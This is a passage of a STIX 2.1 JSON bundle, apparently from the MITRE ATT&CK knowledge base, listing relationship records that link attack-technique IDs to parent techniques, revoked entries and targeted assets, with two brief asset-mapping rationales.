"x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ccbb44ad-2220-4260-99ce-9142c44fc797", "created": "2023-09-28T21:10:03.272Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:10:03.272Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ccdff6e8-75ea-4386-ab0f-435ac35ccc61", "created": "2020-03-13T18:11:08.520Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd228bad-f797-4d32-a510-d601b58553f6", "created": "2019-12-12T14:59:58.329Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd54b7ba-c96c-49c8-90d2-15677efb8fe2", "created": "2023-09-28T20:15:56.470Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:15:56.470Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd958638-07f3-4c7f-acf3-404195d3a325", "created": "2020-03-14T23:25:21.184Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c", "target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce39dc03-c3aa-4c6b-9edb-c05c3b934cbd", "created": "2020-03-11T14:43:31.829Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce3aad7e-1e15-40c7-916b-e25a647e9986", "created": "2023-09-29T16:31:36.462Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:31:36.462Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf07fdf9-9737-4fd9-876c-da96d5b8d1a1", "created": "2020-12-28T21:51:00.016Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", "target_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf1c2a1e-90f7-40b1-93a1-7acdffc9e183", "created": "2022-08-09T13:01:43.404Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-08-09T13:01:43.404Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022", "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf36992b-49c7-4a4c-8fd0-30e23cd8d7b8", "created": "2020-01-14T01:29:43.874Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf53ff89-3c31-4f8d-83a1-b74dce4c558d", "created": "2023-09-29T16:29:16.222Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:29:16.222Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf832fb0-e09a-4192-a6e6-2a53e8943881", "created": "2024-05-22T17:22:01.144Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:20:34.186Z", "description": "Asset Mapping Rationale: Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. Further, adversaries may leverage Data from Configuration Repository in order to obtain hashed credentials for network devices.", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf8a816c-30ee-4147-a48f-d797fb145a04", "created": "2023-09-29T17:43:10.828Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:43:10.829Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cfaead3c-3db5-400f-bd15-dfbc57cf0185", "created": "2023-09-28T21:15:44.547Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:15:44.547Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d02812b2-23c3-4dce-bf94-c6e464e86fab", "created": "2023-10-02T20:22:25.770Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:22:25.770Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d03de729-9235-4ceb-a1c0-935e2088020b", "created": "2023-09-28T21:29:12.533Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:29:12.533Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d061e030-6ad7-457d-a909-5ca6f7282762", "created": "2020-10-01T00:51:28.557Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d0741465-c94e-4213-b830-2c4f09052334", "created": "2021-03-17T20:31:07.895Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d", "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d0934ba2-a4dc-4e1a-8065-84b142ecb01c", "created": "2020-02-11T18:39:25.202Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d0e5d834-338b-4c5f-968a-f9f477bc7b9f", "created": "2020-03-13T17:48:59.225Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d12eb6a1-bb15-4d95-8390-667cda87923e", "created": "2020-10-02T17:09:50.903Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d15d091e-a720-4fb5-acfc-0982e23fe185", "created": "2020-01-24T15:00:47.394Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--7c93aa74-4bc0-4a9e-90ea-f25f86301566", "target_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d1651c82-8b4e-4aef-b065-732cf12e7b79", "created": "2021-01-22T16:08:40.748Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d1a97502-b41d-40a8-aff5-13367fefc642", "created": "2023-09-28T21:21:45.003Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:21:45.003Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d1bd77d4-9f1a-41ee-bf64-0aa7438e6896", "created": "2023-09-29T16:28:52.111Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:28:52.111Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d1deffba-9885-4b52-b2b5-cbfcec82a52b", "created": "2023-09-25T12:41:26.902Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-25T12:41:26.902Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561", "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d23fd724-563d-4f49-8bcd-09c653728cd3", "created": "2023-09-28T21:28:00.462Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:28:00.462Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2468213-1073-43d0-bd10-020b23597a6f", "created": "2020-06-23T22:28:28.085Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2985b8a-7a29-4b57-b2f1-cddd79fe4242", "created": "2023-09-28T19:53:20.304Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:53:20.304Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3266f04-3453-492d-b9ea-6fb9d0ce3999", "created": "2023-09-29T18:49:54.378Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:49:54.378Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3564f1f-8637-4878-a66a-3e8ea46f7a72", "created": "2023-09-28T19:38:27.199Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:38:27.199Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d389abad-ea54-4ded-b925-85f8409daf8d", "created": "2024-05-22T17:24:28.124Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:21:48.201Z", "description": "Asset Mapping Rationale: Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may also leverage a Network Device CLI on network devices to gather file and directory information.", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3a3d5c2-a7d0-41b8-9f27-4fafc47ec97d", "created": "2022-04-22T18:50:50.487Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-04-25T14:00:00.188Z", "description": "", "relationship_type": "revoked-by", "source_ref": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3cbff81-245f-4025-a24a-f9ca5e006fb4", "created": "2020-01-24T15:11:53.692Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--723e3a2b-ca0d-4daa-ada8-82ea35d3733a", "target_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3d4f469-9847-41ef-a478-5eaf6003d483", "created": "2023-10-02T20:23:00.405Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:23:00.405Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d455330d-f190-4854-8087-4c2c37003b45", "created": "2023-09-29T17:39:29.897Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:39:29.897Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d466f2a4-4d31-4343-b56f-f2d132dc1d3e", "created": "2020-03-20T19:51:55.369Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--54456690-84de-4538-9101-643e26437e09", "target_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d48894cb-457e-4a81-82b4-2d735aea5128", "created": "2023-09-28T19:50:56.496Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:50:56.496Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d4895c50-334c-4d8b-b329-8613de602fa4", "created": 